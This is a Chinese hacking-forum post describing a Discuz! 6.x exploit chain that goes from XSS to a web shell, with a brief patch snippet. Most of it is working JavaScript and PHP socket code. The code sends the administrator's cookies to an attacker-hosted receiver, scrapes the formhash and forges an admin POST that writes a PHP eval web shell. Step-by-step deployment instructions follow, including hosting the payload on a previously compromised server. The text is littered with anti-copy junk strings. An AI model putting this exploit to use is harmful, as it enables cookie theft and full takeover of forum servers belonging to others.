中国网络渗透测试联盟

标题: Discuz XSS得webshell [打印本页]

作者: admin    时间: 2012-9-13 17:11
标题: Discuz XSS得webshell
Discuz XSS得webshell
1 v# ^  C2 g8 X, DBy racle @tian6.com
( ]! l3 c: v' _欢迎转帖.但请保留版权信息.; R1 d  @" _- |! h
受影响版本iscuz<=6.1.0,gbk+utf+big5
- _7 Q3 T7 s5 F$ A. E$ T
8 @( Y. f+ s3 g& b& v新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效./ O2 m3 _; C7 @

1 V% a. x( A! _& G* h5 H
% l, k; V/ {+ J+ ~5 K! z& ]7 z3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
! b* Y$ c. L- Z  E; n当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
& M5 ^% E9 d/ o) m$ V' |5 O% F
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..* q6 X2 s$ u4 \. _& s3 O1 @
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS: K. j; }) _' r/ d. _$ w  O. u

& A) x4 x' r0 U) a' R
3 M) G( L& c! a5 p. q----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------; r% f9 j' T+ W+ h! q
4 i) Z8 Z1 |2 W/ j6 z) I* C; j( i
0 h' i  i+ E9 ~9 m0 H5 D! N
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.8 F' K" `: N  M, L0 G. }2 p; T

6 c' q: k' Y& [9 A% m/ z& eproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
5 u4 o" n# Z* `  V
. Z; X/ j: a1 W3 W' p5 [/ rproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
; f8 H9 L' N. K" V# e& T: [: I  `* ]4 |+ I2 `
3 \5 c1 d# ?: @
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
: f( [% W' T) e7 i- y/ {  m3 O4 f# l- q. v, }
        global $runwizardfile, $runwizardhistory;
% {9 S0 _: j5 e6 r! }' J/ m
4 ]# A/ T: L  E. J; `# i0 L4 R  m! M        $fp = fopen($runwizardfile, 'w');% u  r8 d+ q9 t3 {, _
+ U; m/ Z: A% V0 i* E6 c7 }0 W
        fwrite($fp, serialize($runwizardhistory));+ M. x: c* h+ }5 q/ V) q; e

& `4 p* t" T9 |3 [0 f0 M- E2 S' r$ h; w        fclose($fp);4 W/ i) p1 ]7 w2 V5 F5 x& l  l3 w- C
. n' l0 ?. B. U) ~; u) q* l
}
! G  `$ A# A$ n8 V2 H0 h复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
  |2 Q( ]+ J" W+ D/ x, _5 I以下是修补的办法:function saverunwizardhistory() {
& F0 T$ W: C( o& i/ k& }+ m: g, w' y& T
        global $runwizardfile, $runwizardhistory;2 L: z( V( p) z8 N( N3 r7 K
( r  |4 v  l/ ]  k6 `/ N
        $fp = fopen($runwizardfile, 'w');6 Y& N( x" s6 |

+ S/ V) S$ Q. [2 N        $s = '<?php exit;?>';
5 F, _! o* l( o% w: u; S8 n; {9 M6 Q4 K8 y% x& T+ s
        $s .= serialize($runwizardhistory);% J5 W. a; R" a6 [7 ^$ P9 y$ @
) K1 v) `  ^: S
        fwrite($fp, $s);
+ ?8 S% x0 K6 s4 ?3 \, w: S' y
6 U6 [2 N5 g& R/ j) m* M+ p8 o; W        fclose($fp);
7 i! K% R' b0 t% s9 A
: n! d3 r/ F2 a}
" }6 W6 D4 h1 M5 M0 e复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
5 m$ z- p  n9 p1 _: b2 m9 o9 N2 V" P

' p! w/ n# R2 T3 H4 K6 y- ?( J  T5 X$ f; [6 i( }' l* z- o% ~
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------& d2 }, g# G5 k* x' d' a0 ?
* \* Z7 x' \& F9 Z/ _

% X  r. {+ P% w5 n) R* @  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了., R" O" b3 x6 Z0 o5 U; \. S1 ^
7 }8 S3 H5 z8 M8 i( \( }. p* p3 c$ F
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
/ i) ^2 ~; m; s& d( q/ i2 I8 F4 Q* ]  w! c
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.+ ~7 }. {8 J0 s6 q" Q

+ n/ o, V& V: p8 Q首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
8 |/ C  a3 \: D" ]. o
' Q6 Q# b2 R! h2 K1 _) `& k; ~  F5 uvar url="http://目标网站/admincp.php";      
$ `- p5 ?$ @! i+ z+ `
  j* t- [! ]. R9 m( M/ M/*获得cookies*/
: ]  D! s6 i- V; h7 p  @; U) `" E1 J% ~9 K1 X
function getURL(s) {* |3 n8 l2 t1 N4 j  U& C6 c' o
/ |7 m' f/ b& i
var image = new Image();
- b, g' \7 f3 @/ U3 U* q" K
* P- m2 i- G" Z* J7 U1 Zimage.style.width = 0;
/ r7 I( [$ T1 R$ n1 A: h  M" ?' b3 z2 K/ M/ r4 n4 I! `
image.style.height = 0;
0 G9 ?% M$ e% T4 [2 f  r" U, e2 p7 Z9 V. I
image.src = s;
8 r7 a9 S$ E9 r8 Z6 e' s5 Q5 F$ B" s3 w$ P  y; N8 ?7 y" ^; M2 d- _3 M# Z
}
, \& h) L! F0 ]' _2 L  N  o5 Q6 }' V! o2 H7 `1 [" K
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php& _7 g9 ^7 M! O: e. H
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
3 O. F- S9 D" m1 y3 I复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) * a+ _. C' C6 d: n1 P1 p* x& [# f
& i9 i3 n) s2 N8 Q( Q) W* r
* t! o8 b0 ^, \# b% l- b$ R
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";, L! ?% v) j; ^# v
, y( o; E& H* g' ]5 w) b6 l2 O( G

, u. D8 @" f5 I7 U7 I+ X* e$ n
4 K6 m2 R9 O- S+ m* G) U/*hash*/
: j" `4 P/ C( y2 Q
9 n1 e" T9 u, B. `var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");: k- M- I) b+ o$ N
& x& @1 W. L! G$ k8 m( b# w
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
1 W& c8 d6 s- U9 }" |: s. z+ O: o* _+ _
xmlHttpReq.send();2 ~2 K9 j: a- g
: c* j! k* ?! u1 f4 [' u
var resource = xmlHttpReq.responseText;
3 A# |1 J) F& I$ n, w0 R1 U6 t5 H
" n; D1 D, w9 O8 D- hvar numero = resource.search(/formhash/);
% w- w" G6 ~  U0 X% @; B% l) v/ m* `# J6 M7 g- a
var formhash=encodeURIComponent(resource.substr(numero+17,8));& P* x& Z% l# }  k3 X( h

( L- o7 z" D. ?, \- l1 @
  m+ J+ c- o% P  U* v6 X: j0 i8 A) v5 |- V/ F5 t9 [- N/ U
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
/ C: n3 K* Z: Y. v" F0 b- R# v
4 ^2 o2 l/ s/ ~* Q+ u1 D% @& }xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 6 p+ t/ _6 `: X: F- Z

+ V# U$ {; s4 ~) l: }: oxmlHttpReq.setRequestHeader("Referer", url);
. S  o+ f/ {0 J+ p" F, l+ G( Z9 M! ?& P: S5 u( |9 S. B! e4 G5 d
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");! v; j8 h+ D" B4 @' I1 `

1 ^9 A: t5 Q3 |3 e/ axmlHttpReq.setrequestheader("content-length",post.length);
* T+ M' a, W; l# D9 j. A: s; R3 z" U! d+ `
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); 6 F2 B$ A1 s1 |' L+ _7 ?. g
: P3 H4 ?' o* O5 s4 c
xmlHttpReq.send(post);//发送数据
2 X5 b) I) Z2 F* g7 Y! \( }! `( \复制代码这里HASH我假设正确,这样提交,也无须cookies
5 N8 }, Y+ e( ?7 a8 m7 T$ K6 B& a; N- A3 v$ _0 X' B9 l. J
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
& Z# T9 o: I# S  e; p& D' Q" B# F: K8 Y3 l0 g& m, e
if (!$sock) die("$errstr ($errno)\n");4 {! h9 A: w: F" c, o3 O4 t
$ n* O/ e2 f( A+ `2 Y# L. J
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
2 j6 O0 e! o" |! W, d% g% L% w% p0 J: n* z0 N( b
: M* g+ }% O2 z1 V3 ]: a( K

, w" S* q: V; H7 L. p3 g3 U5 l- V: g5 r7 Sfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
6 B4 D$ A( v% f: W& T" m( i
% h6 ?5 @, k! p+ Lfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");/ x/ v1 y, _, G- L3 e

6 i6 s4 c( h0 Y6 X- U2 t* |( Efwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");/ @8 g- ]9 O2 u1 t! ?# g* Y

* J& U& G5 q; V: y& H8 hfwrite($sock, "Accept-Language: zh-cn\r\n");
1 m8 `: Q4 p" v. |: M2 f* q
$ v; U4 V3 z9 ~- afwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
7 z- Z1 J9 I% |$ h, w) N% b
% T% E% F: C) x  E: [. v/ c: hfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");+ I6 ^- t) Y7 p: \: b

: F6 a7 T4 M- F  Z* V* b5 hfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");( ^3 `4 z! l8 M3 s7 W2 \% }) J$ x
  M" B7 T0 P, m
fwrite($sock, "Host: $url\r\n");
" R( ^" k. |/ G! ^8 N) O5 s. J8 K% f3 d
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");5 c+ O, s8 Q- y4 n. d

* i  Q( c9 N# X# G7 Rfwrite($sock, "Connection: Keep-Alive\r\n");  ^: j6 L: ~8 e8 z* V
4 j* Q" y  ~3 B8 K
fwrite($sock, "Cache-Control: no-cache\r\n");
3 W/ F$ i- w( M/ p9 X: P6 m7 \' X1 d4 f8 x' w: k
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");! `! L7 A4 D0 Z* O' [: X, z: h

" d2 Y( u" Y, u+ v, p3 afwrite($sock, $data);
4 O# J3 f+ I$ i$ M. V. {$ Q
0 R/ u# D8 w5 J1 L2 y# l
. d  w$ Y: F4 h+ X
" y  J. p5 A9 ], a$headers = "";7 {! j0 @1 |. ^: K$ A1 R
$ z) v6 x* w  J
while ($str = trim(fgets($sock, 4096)))
+ V+ K' x* A  l( _% h, p% D/ u# p  q; X2 ~
     $headers .= "$str\n";8 l: S; \  |9 b+ m0 w

/ r) |/ [. X% v+ e3 F3 Uecho "\n";
( \' L  ~( v2 ^- R
7 V( w% V$ ?& A4 H5 B$body = "";% C9 A( J( L, z7 T& N: r

+ J1 U8 b# I6 {while (!feof($sock))
0 d5 x! A4 Y! ?- }* {+ O0 C% E  ~
1 k. e' C. n2 X( a( t, y( [4 m     $body .= fgets($sock, 4096);" ?) _: {4 R" ~

; ?" N- {2 d. ^3 hfclose($sock);. m! s5 A; M2 [$ n$ }% `2 [: ]6 o
. i+ _0 {/ D1 V0 X
echo $body;6 a/ d9 U# Z) y3 O# @9 n# X  P
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
2 Q( B# U( K+ w0 q( U; }  L  e3 s0 n, D1 t& R6 i0 X+ F5 a

5 a3 \# `$ R, k$ T# {( }-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------0 v5 ~( y6 a3 C7 i4 O

# O1 b! b! G1 i1 }( k3 `0 F+ C; y: Q) q, ?: `* P% T% j" L% W
1HP SOCKET利用方法首先打开racle.js
5 s" f( G) z, q$ S+ h8 j4 o2 t' }  M( K3 o
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
% L" Z0 ]6 o' p4 m9 z* {
1 n. ?! b; q' j: H( q% b' X' L1 u, [" O9 H

* p' {7 \! o# `! \3 J  e: T" `. ?2 m& |然后打开racle@tian6.php
! Y. z- Y0 D. ~2 `4 C
) K9 h; M! N7 T$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com6 E% C9 w3 i' a

2 _/ |2 \' H/ }2 d7 ?( R5 n
1 O( Y- T  |+ y' R  l/ T5 [0 f/ T) N) s; x. y
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:$ h- b. {9 }4 u" x& x( J
% D. i8 V9 h# P0 {
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));; Y: j/ Q' ]7 l$ M; B) j! j

) U4 [* U/ c7 n: ~: x
% Y/ S/ `2 ~: _& h5 t4 [$ }( h  x4 N2 ^3 Y' O8 C, [$ M
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
  q. z* J" c) J; K. d0 I  k复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
+ Q" z" A3 S( Q9 T6 s: ^. j4 `. f, j

$ R7 D1 Y6 E2 }+ f9 e/ s  ~0 c
& K5 x0 L" @) H2 s: I% v如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
8 h( v8 x9 h& }* Y0 z+ C! q, `
+ c0 w" i1 h$ `, C$ Q; \2 rvar formhash=encodeURIComponent(resource.substr(numero+17,8));
- Y5 e' Y/ W( S; Y9 y2 y' ~$ u% n
/ J) g4 ?9 f6 b. S+ c3 K' s' z$ p& W
; S  V# |. }* X! I5 r" q) E) B, V% H) S  p+ z8 ]. P
var formhash=encodeURIComponent(resource.substr(numero+9,8));  ~1 w0 R" k7 @" O2 j( A
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.  |6 I9 M$ n; U' T, E
: g4 t- s) X; V% x
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.2 E: j. K8 |9 f2 O

( a; M+ G. |5 A/ K) V如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
& D7 j$ [( e3 m3 ?4 b! ]8 i  k" L5 {& {4 l/ b4 ?& u1 s3 B( @
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
" ]# z& I/ Y: G5 R! ?, d7 | / a+ d- S3 n$ @! T





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2